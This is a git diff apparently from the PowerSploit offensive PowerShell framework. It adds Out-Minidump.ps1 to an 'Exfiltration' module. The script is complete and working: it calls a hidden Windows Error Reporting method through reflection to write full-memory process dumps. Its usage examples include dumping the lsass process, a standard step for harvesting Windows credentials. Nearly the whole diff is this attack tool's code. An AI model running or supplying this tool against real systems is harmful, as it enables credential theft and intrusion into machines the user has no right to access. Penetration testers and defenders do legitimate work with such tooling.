diff options
Diffstat (limited to 'Exfiltration')
| -rw-r--r-- | Exfiltration/Exfiltration.psd1 | 3 | ||||
| -rw-r--r-- | Exfiltration/Out-Minidump.ps1 | 133 | 
2 files changed, 135 insertions, 1 deletions
| diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 7eb9aa2..7c65566 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -73,7 +73,8 @@ AliasesToExport = ''  ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
  # List of all files packaged with this module
 -FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
 +FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
 +           'Usage.md'
  # Private data to pass to the module specified in RootModule/ModuleToProcess
  # PrivateData = ''
 diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1 new file mode 100644 index 0000000..b89f3dc --- /dev/null +++ b/Exfiltration/Out-Minidump.ps1 @@ -0,0 +1,133 @@ +function Out-Minidump +{ +<# +.SYNOPSIS + +    Generates a full-memory minidump of a process. + +    PowerSploit Function: Out-Minidump +    Author: Matthew Graeber (@mattifestation) +    License: BSD 3-Clause +    Required Dependencies: None +    Optional Dependencies: None + +.DESCRIPTION + +    Out-Minidump writes a process dump file with all process memory to disk. +    This is similar to running procdump.exe with the '-ma' switch. + +.PARAMETER Id + +    Specifies the process ID of the process for which a dump will be generated. + +.PARAMETER DumpFilePath + +    Specifies the path where dump files will be written. By default, dump files +    are written to the current working directory. Dump file names take following +    form: processname_id.dmp + +.EXAMPLE + +    Out-Minidump -Id 4293 + +    Description +    ----------- +    Generate a minidump for process ID 4293. + +.EXAMPLE + +    Get-Process lsass | Out-Minidump + +    Description +    ----------- +    Generate a minidump for the lsass process. Note: To dump lsass, you must be +    running from an elevated prompt. + +.EXAMPLE + +    Get-Process | Out-Minidump -DumpFilePath C:\temp + +    Description +    ----------- +    Generate a minidump of all running processes and save them to C:\temp. + +.INPUTS + +    System.Diagnostics.Process + +    You can pipe a process object to Out-Minidump. + +.OUTPUTS + +    None + +.LINK + +    http://www.exploit-monday.com/ +#> + +    [CmdletBinding()] +    Param ( +        [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] +        [ValidateScript({ Get-Process -Id $_ })] +        [UInt16[]] +        $Id, + +        [Parameter(Position = 1)] +        [ValidateScript({ Test-Path $_ })] +        [String] +        $DumpFilePath = $PWD +    ) + +    BEGIN +    { +        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') +        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') +        $Flags = [Reflection.BindingFlags] 'NonPublic, Static' +        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) +        $MiniDumpWithFullMemory = [UInt32] 2 +    } + +    PROCESS +    { +        foreach ($ProcessId in $Id) +        { +            $ProcessInfo = Get-Process -Id $ProcessId +            $ProcessName = $ProcessInfo.Name +            $ProcessHandle = $ProcessInfo.Handle +            $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" + +            $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + +            $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + +            $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, +                                                         $ProcessId, +                                                         $FileStream.SafeFileHandle, +                                                         $MiniDumpWithFullMemory, +                                                         [IntPtr]::Zero, +                                                         [IntPtr]::Zero, +                                                         [IntPtr]::Zero)) + +            $FileStream.Close() + +            if (-not $Result) +            { +                $Exception = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error() +                $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + +                # Remove any partially written dump files. For example, a partial dump will be written +                # in the case when 32-bit PowerShell tries to dump a 64-bit process. +                Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + +                throw $ExceptionMessage +            } +            else +            { +                Write-Verbose "Success! Minidump written to $ProcessDumpPath." +            } +        } +    } + +    END {} +}
\ No newline at end of file |